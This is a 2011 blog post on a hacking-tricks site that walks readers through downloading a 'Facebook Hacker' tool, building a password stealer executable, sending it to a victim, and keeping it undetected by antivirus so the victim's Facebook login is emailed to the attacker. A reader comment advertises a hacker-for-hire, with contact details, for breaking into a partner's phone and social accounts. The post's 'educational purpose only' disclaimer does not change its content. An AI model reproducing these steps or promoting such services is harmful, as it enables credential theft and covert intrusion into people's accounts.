Sunday 1 May 2011

Hack Facebook Account with the help of Facebook Hacker

Today morning I m searching some latest hacking tool & I found facebook hacker software. But when I search about this “facebook hackersoftware that its really work or not. I don’t get any information so, I decided to share “how facebook hacker work to hack facebook account???”

Note: - I don’t know this software really hack facebook account or not. So, if you want to use it then use at your own ricks.

STEP 1: First ensure that you have installed Microsoft .Net Framework. If not, then you can download it from here: Download .Net Framework

STEP 2: 
DOWNLOAD the Facebook Hacker
Password:- TRICKS4INDYA

STEP 3: Extract the downloaded “Facebook Hacker” file using Winrar. (If you don’t have it then you can GET IT HERE)

STEP 4: Open “Facebook Hacker.exe” file.



NOTE:- The “Stub.exe” file may get detected by your anti-virus. Please don’t open the “Stub.exe” file and don’t delete it too, otherwise the stealer created by you won’t work at all...

STEP 5: After opening the “Facebook Hacker.exe” file build your password stealer as shown in the image below:


STEP 6: Now a new file will be created in the same directory with the name you provided while building (eg. server.exe). Just send the file you created to the victim and if the victim runs this file….W00t….you will get his Facebook account’s username and password to your fake email ID which you provided while building the file.
thats all Enjoy.......:)

NOTE:- it’s possible that when victim download server.exe file & victim anti viruses detecting it as hacking software’s & delete it. So, you have to make that file FUD.

Note: This is illegal and is for educational purpose only. Any loss/damage happening will not be in any way our responsibility.

If u like then ple follow my blog & also help to promote. Don’t forget to leave comment.

1 comments:

My life was falling apart, I was being cheated and abused, I had to know the truth and needed proof. I contacted a private investigator that linked me with julio who took care of the hack job. He hacked his iPhone, Facebook, Instagram, Whats app, Text messages, Call logs, twitter and email account. I got all I wanted as proof . I''m glad i had a proven truth he was cheating. Contact him for any hack job. Tell him i referred you, he will surely meet your hack need. Contact:julliohacks@gmail.com, Whatsapp +19293148606 he will be glad to help you.

Post a Comment

Related Posts Plugin for WordPress, Blogger...
Twitter Delicious Facebook Digg Stumbleupon Favorites More